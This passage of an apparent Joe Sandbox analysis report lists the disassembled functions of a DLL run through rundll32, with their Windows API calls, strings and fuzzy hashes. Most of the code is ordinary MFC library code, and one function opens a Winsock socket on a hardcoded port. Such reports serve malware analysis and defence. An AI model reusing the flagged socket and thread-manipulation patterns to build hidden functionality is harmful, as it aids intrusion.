Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04

Strings

EnumDisplayDevicesA, xrefs: 10018BFE
MonitorFromRect, xrefs: 10018BBA
GetSystemMetrics, xrefs: 10018B98
USER32, xrefs: 10018B78
MonitorFromPoint, xrefs: 10018BCB
MonitorFromWindow, xrefs: 10018BA9
GetMonitorInfoA, xrefs: 10018BED
EnumDisplayMonitors, xrefs: 10018BDC

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9

Uniqueness

Uniqueness Score: -1.00%

Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 1002A7CB
IsWindowEnabled.USER32(?), ref: 1002A827
__EH_prolog3_catch.LIBCMT ref: 1002A875
GetFocus.USER32 ref: 1002A895
GetParent.USER32(?), ref: 1002A8E0
GetParent.USER32(?), ref: 1002A8F0
GetKeyState.USER32(00000012), ref: 1002A9AE
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1002AA62
GetFocus.USER32 ref: 1002AA75
GetFocus.USER32 ref: 1002AA82
IsWindow.USER32(?), ref: 1002AA9A
GetFocus.USER32 ref: 1002AAA6
IsWindow.USER32(?), ref: 1002AABC
GetFocus.USER32 ref: 1002AAC2
GetKeyState.USER32(00000010), ref: 1002AAEB
MessageBeep.USER32 ref: 1002ABE2

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

GetParent.USER32(?), ref: 1001AA75
SendMessageA.USER32 ref: 1001AA98
GetWindowRect.USER32 ref: 1001AAB2
GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
CopyRect.USER32(?,?), ref: 1001AB15
CopyRect.USER32(?,?), ref: 1001AB1F
GetWindowRect.USER32 ref: 1001AB28
CopyRect.USER32(?,?), ref: 1001AB44

Strings

(, xrefs: 1001AAE0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 100161DE
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
CloseHandle.KERNEL32(?), ref: 1001625C
SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
CloseHandle.KERNEL32(?), ref: 10016280
CloseHandle.KERNEL32(00000002), ref: 100162A2

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
String ID:
API String ID: 3191170017-0
Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61

Uniqueness

Uniqueness Score: -1.00%

Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F

Strings

DeactivateActCtx, xrefs: 10014594
ReleaseActCtx, xrefs: 1001457A
CreateActCtxA, xrefs: 10014572
KERNEL32, xrefs: 10014555
ActivateActCtx, xrefs: 10014587

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22

Uniqueness

Uniqueness Score: -1.00%

Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10017375
FindResourceA.KERNEL32 ref: 100173A8
LoadResource.KERNEL32(?,00000000), ref: 100173B0
LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
GetDesktopWindow.USER32 ref: 100173F4
IsWindowEnabled.USER32(000000FF), ref: 10017402
EnableWindow.USER32(000000FF,00000000), ref: 10017411

Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

EnableWindow.USER32(000000FF,00000001), ref: 100174ED
GetActiveWindow.USER32 ref: 100174F8
SetActiveWindow.USER32(000000FF), ref: 10017506
FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1001C7D8
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841

Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C

SetWindowLongA.USER32 ref: 1001C868
RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E

Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2

Strings

AfxOldWndProc423, xrefs: 1001C7E0, 1001C7E5, 1001C86E, 1001C876

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65

Uniqueness

Uniqueness Score: -1.00%

Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON

Download Yara Rule

APIs

Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9

inet_addr.WS2_32(?), ref: 10012ECA
htons.WS2_32(00001C1F), ref: 10012EF0

Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8

WSAStartup.WS2_32(00000202,?), ref: 10012F58
_printf.LIBCMT ref: 10012F79
socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
WSACleanup.WS2_32 ref: 10012FB6

Strings

Please enter your name, xrefs: 10012F3D
WSAStartup function failed with error: %d, xrefs: 10012F74
error, xrefs: 10012FAC

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
String ID: Please enter your name$WSAStartup function failed with error: %d$error
API String ID: 4222005279-2156106531
Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55

Uniqueness

Uniqueness Score: -1.00%

Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
__lock.LIBCMT ref: 10035229
___addlocaleref.LIBCMT ref: 10035248

Strings

DecodePointer, xrefs: 100351F7
KERNEL32.DLL, xrefs: 100351C1
EncodePointer, xrefs: 100351E3

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1036688887-2843748187
Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10017185
GetSystemMetrics.USER32 ref: 10017236
GlobalLock.KERNEL32 ref: 1001729F
CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE

Strings

MS Shell Dlg, xrefs: 10017240

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 10021EFD
GetStockObject.GDI32(0000000D), ref: 10021F05
GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
GetDC.USER32(00000000), ref: 10021F21
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
MulDiv.KERNEL32 ref: 10021F41
ReleaseDC.USER32(00000000,00000000), ref: 10021F4D

Strings

System, xrefs: 10021EF8, 10021F62

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 100209F4
EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
TlsGetValue.KERNEL32 ref: 10020A23
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
_memset.LIBCMT ref: 10020AE2
TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10025BAC

Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
GlobalLock.KERNEL32 ref: 10025DB2
GlobalUnlock.KERNEL32(?), ref: 10025DCA
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 10014A3F
lstrcmpA.KERNEL32(?,?), ref: 10014A4B
